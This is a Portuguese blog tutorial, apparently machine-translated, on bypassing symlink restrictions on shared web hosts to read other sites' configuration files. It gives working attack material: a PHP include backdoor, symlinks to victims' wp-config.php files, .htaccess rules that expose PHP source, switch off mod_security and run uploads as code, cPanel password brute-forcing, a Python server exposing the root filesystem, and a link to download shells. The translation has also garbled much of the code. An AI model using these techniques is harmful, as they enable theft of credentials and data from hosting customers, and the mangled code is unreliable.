Hoje eu vou explicar como contornar Symlink em 2013 Servidor Com diferentes. Htaccess e Métodos.
Então vamos começar :)
Nota: Este método não é aplicável para GoDaddy, Bluehost, Hostgrator e Servidores Hostmonstor.
Para este primeiro você precisa dos seguintes arquivos:
1 -> Sen Haxor CGI Shell
2 -> sen.zip
3 ->-passwd bypass.php
4 -> Turbo Força bruta Cpanel
5 -> Port.py
Antes de iniciar a ligação simbólica precisamos criar php.ini e ini.php para desativar o modo de segurança e funções desativadas no servidor.
Use o seguinte código:
Faça um php.ini com o seguinte código
safe_mode = Off
E ini.php com
<?
eco ini_get ("safe_mode");
eco ini_get ("open_basedir");
include ($ _GET ["arquivo"]);
ini_restore ("safe_mode");
ini_restore ("open_basedir");
eco ini_get ("safe_mode");
eco ini_get ("open_basedir");
incluem ($ _GET ["ss"]);
>
Vou postar o link de download dos arquivos que eu uso no final do tutorial.
Assim, depois de criar php.ini e ini.php carregar os outros arquivos para o servidor.
Ignorando SYMLINK ON PLESK, debian, CENTOS e RedHat SERVIDORES
Agora eu vou explicar como contornar symlink em Plesk, Debian, Centos e Red Hat
Comumente todos os itens acima têm como caminho raiz
/ Root / var / www / vhost /
onde todos os sites estarão sob diretório vhost. Mas você não tem permissão para vê-lo por isso vamos criar um link simbólico para torcer e ver o site e link simbólico dos arquivos de configuração
Cria um novo diretório no seu exemplo shell sen, em seguida, fazer o upload sen.zip. Em seguida, use este comando para descompactar o arquivo e criar um link simbólico de raiz.
Comando: unzip sen.zip
Nota: Em alguns servidores descompactar comando não vai funcionar assim que você pode criar manualmente um link simbólico para o root usando o comando ln-s / root
Em seguida, você vai ver isso
$ Unzip sen.zip
Arquivo: sen.zip
vinculação: sen.txt -> /
acabamento diferidos links simbólicos:
sen.txt -> /
Isso significa um link simbólico foi criado para / root.
Agora precisamos fazer o upload. Htaccess use o seguinte
Opções de todos os
DirectoryIndex Sux.html
AddType text / plain. Php
AddHandler server-analisado. Php
Feito Bypassed já Visualizar / var / www / vhost / e você vai ser exibido com todos os sites.
Ignorando SYMLINK ON Apache e LITESPEED
Principalmente quando você tenta apache symlink em 2013 servidor você terá de enfrentar 403 proibido ou 404 não foi encontrado e 500 Internel Erro de servidor
Estes podem ser Bypass, usando diferentes. Htaccess individualmente.
Ignorando SYMLINK no Apache e LITESPEED - Servidores Linux.
Primeiro para este fazer um novo diretório no seu exemplo shell sen, em seguida, fazer o upload e sen.sa. Htaccess do Sen Haxor CGI shell que eu adicionei o link de download no final do Tutorial
Depois de fazer o upload. Htaccess e sen.sa para um novo diretório sen chmod sen.sa para 0755
Em seguida, abra o shell de login do CGI (Senha: senhaxor)
Agora, existem vários métodos para contornar 403 forbidden você precisa experimentar os seguintes métodos. Pelo menos um vai dar-lhe o sucesso.
Método 1: Método shtml.
Este é o método comumente usado pela maioria dos hackers para contornar 403 forbidden erro.
Então, antes de procced primeiro você precisa para obter todos / etc / passwd do servidor, para que possamos encontrar o nome de usuário eo caminho de onde os sites estão localizados.
2013 Servidor principalmente Muitas funções são ativadas, que mostra 403 proibido quando você tenta ler cat / etc / passwd do servidor
Então eu fiz uma Shell Powerfull que pode ignorar e get / etc / passwd do servidor.
Além disso, vou adicioná-lo aos downloads.
Envie o etc / passwd shell / Bypasser e obter todas / etc / passwd
Então Entre para Sen Haxor CGI Shell e criar um link simbólico para o seu destino
Passo 1: ln-s / root
Passo 2: 1.shtml ln-s / home / username / public_html / config.php
Exemplo, se o nosso site é www.site.com e nome de usuário é o site e seu Wordpress
ln-s / home / site / public_html / wp-config.php 1.shtml
Então nós criamos um link simbólico para o nosso alvo agora você precisa ir ao seu Shell e editar o htaccess com o seguinte código.:
Opções + FollowSymLinks
DirectoryIndex itti.html
RemoveHandler. Php
AddType application / octet-stream. Php
Depois de feito isso Abra o 1.shtml no seu navegador e rightclick e ver fonte. Você será capaz de ver a configuração.
Esta é a forma mais comum de Bypass 403 proibido e Litespeed.
Agora deixe-me explicar-lhe o método avançado =)
Método 2: Ignorar configuração simbolicamente De Cpanel
Para isso você precisa de pelo menos um Cpanel Acesso no sever. Vou dizer-lhe como quebrar facilmente Cpanel.
Primeiro execute este comando: ls / var / mail
Então você vai ser exibido com todos os nome de usuário do servidor Copiar tudo.
Agora Carregar Turbo Brute Force Cpanel Script (eu vou anexá-lo vai os downloads).
Abra o Script e em User Cole todo o nome que temos.
E por senha aqui é a lista de palavras:
Copie tudo e cole em Senha Selecione simples e clique em Enviar
Se a sua sorte, você vai ser exibido com cPanels rachados.
Uma vez que você tem um cpanel no servidor você pode ignorar 500 Internel Servidor Erro 403 Forbidden Erro De Porta: 2077 e do erro-páginas de gerenciador de arquivos.
Apenas symlink a configuração
ln-s / home / user / public_html / wp-config.php config.shtml
Entre para o cpanel
Então vá ao Gerenciador de Arquivos -> páginas de erro
Em seguida, escolher qualquer uma destas de acordo com o erro é acionado quando você abrir sua configuração ligada simbolicamente
400 (Bad request)
401 (Autorização obrigatório)
403 (Forbidden)
404 (não encontrado)
500 (erro interno do servidor)
Exemplo "& file = 400.shtml & desc = (Bad request)
podemos obter a configuração de
"& File = config.shtml & desc = (Bad request)
DESVIO SYMLINK DO PORTO 2077
Então, quando você simbolicamente Config Você só pode acessar a porta 2077
Então public_html / path / config.shtml
Você poderá baixar o config.shtml e você pode ver a fonte.
Método 3: Symlink Bypass via Porta Aberta usando Python
Para este Primeiro Python para ser instalado no servidor.
Para verificar se o Python está instalado executar este comando python-h
Se a sua instalação, podemos usar o seguinte script python e Bypass
#! / Usr / bin / env python
# Devilzc0de.org (c) 2012
SimpleHTTPServer importação
SocketServer importação
import os
port = 13123
if __ name__ == '__main__':
os.chdir ('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd SocketServer.TCPServer = (("", porta), Handler)
print ("Agora, abra este servidor no webbrowser na porta:" + str (porta))
print ("exemplo: http://site.com:" + str (porta))
httpd.serve_forever ()
Eu adicionei o script para downloads.
Agora Carregar o script para o shell
Agora Carregar o script para o shell
agora executar este comando: python port.py
Agora Abra o site com a porta 13123
Servidor Bypassed De Porta Aberta.
Método 4: Symlink Ignorando Usando o método ini.
Entre para Sen Haxor shell CGI normalmente criar um link simbólico para o seu alvo in. Extensão ini.
ln-s / home / user / public_html / wp-config.php config.ini
agora vá para o shell e fazer um novo arquivo a.shtml
Cole o seguinte código dentro dele e guardá-lo
<- # Include virtual = "config.ini" ->
e salvá-lo.
Agora, abra o a.shtml no navegador e clicar e ver a fonte certa. Feito Bypassed
Método 5: Symlink Ignorando Usando arquivo Leiame
Cria um novo diretório em seu shell a partir do shell Cgi normalmente symlink a configuração
ln-s / home / user / public_html / config.txt config.php
agora fazer. htaccess com o seguinte código.
. Htaccess
Todas as opções
ReadMeName config.txt
Agora, quando você abrir o diretório do navegador que você irá ser exibido com a fonte de configuração diretamente.
ex: site.com / sen / config.txt é sua configuração ligada simbolicamente, em seguida, quando você abre
www.site.com/sen/ você simbolicamente configuração será exibido como um conteúdo Leiame.
É isso que eu tenho explicar todos os métodos para ignorar Symlink Se você vai ter problema Ignorando Experimente todas as seguintes. Htaccess
1 -.> Htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt. Php
AddHandler txt. Php
2 -.> Htaccess
Todas as opções
DirectoryIndex ssss.html
addtype txt. php
AddHandler txt. Php
Mod_security.c> <IfModule
SecFilterEngine Off
SecFilterScanPOST Off
</ IfModule>
3 -.> Htaccess
suPHP_ConfigPath / home / user / public_html / php.ini
4 -.> Htaccess
Opções + FollowSymLinks
DirectoryIndex Sux.html
Opções + Indexes
AddType text / plain. Php
AddHandler server-analisado. Php
AddType text / plain. Html
5 -.> Htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt. Php
AddHandler txt. Php
Mod_autoindex.c> <IfModule
IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble
</ IfModule>
Mod_security.c> <IfModule
SecFilterEngine Off
SecFilterScanPOST Off
</ IfModule>
. Htaccess para BYPASS funções desabilitadas
Este é para tornar o trabalho python:
. Htaccess
Addtype
application / x-httpd-cgi. py
AddHandler cgi-script. Py
AddHandler cgi-script. Py
Este é para tornar o trabalho perl:
. Htaccess
AddType application / x-httpd-cgi. Pl
AddHandler cgi-script. Pl
AddHandler cgi-script. Pl
Este é permitir Symlink se a função é desativada no servidor:
. Htaccess
<Directory "/home"> *** Options-ExecCGI ****
AllowOverride
Índices AuthConfig
Limite FileInfo
Opções = IncludesNÃOEXEC, Indexes, inclui, MultiViews, SymLinksIfOwnerMatch, FollowSymLinks
</ Directory>
Este é para recuperar permissões de usuários:
. Htaccess
AddType text / plain. Php
Opções + Indexes
DirectoryIndex filename.html
Ignorar erro interno do servidor:
. Htaccess
<IfModule Mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </ IfModule>
Alterar versão php:
. Htaccess
AddType application/x-httpd-php4. Php
Bypass Uploads Opções e upload shell em outro ramal:
<FilesMatch "^.*\.mp3"> SetHandler application / x-httpd-php </ FilesMatch>
Recuperar Config com método imagem:
. Htaccess
Opções MultiViews FollowSymLinks Indexes ExecCGI
AddType application / x-httpd-cgi. Gif
AddHandler cgi-script. Gif
AddHandler cgi-script. Gif
Link para download dos scripts eu usei NO TUTORIAL:
www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar
Então é isso que eu acho que eu tinha coberto tudo isso é relacionado ao desvio Symlink e Funções desabilitadas no servidor.
#DivisionHP !
Gr33tz to : SEN HAXOR
Nenhum comentário:
Postar um comentário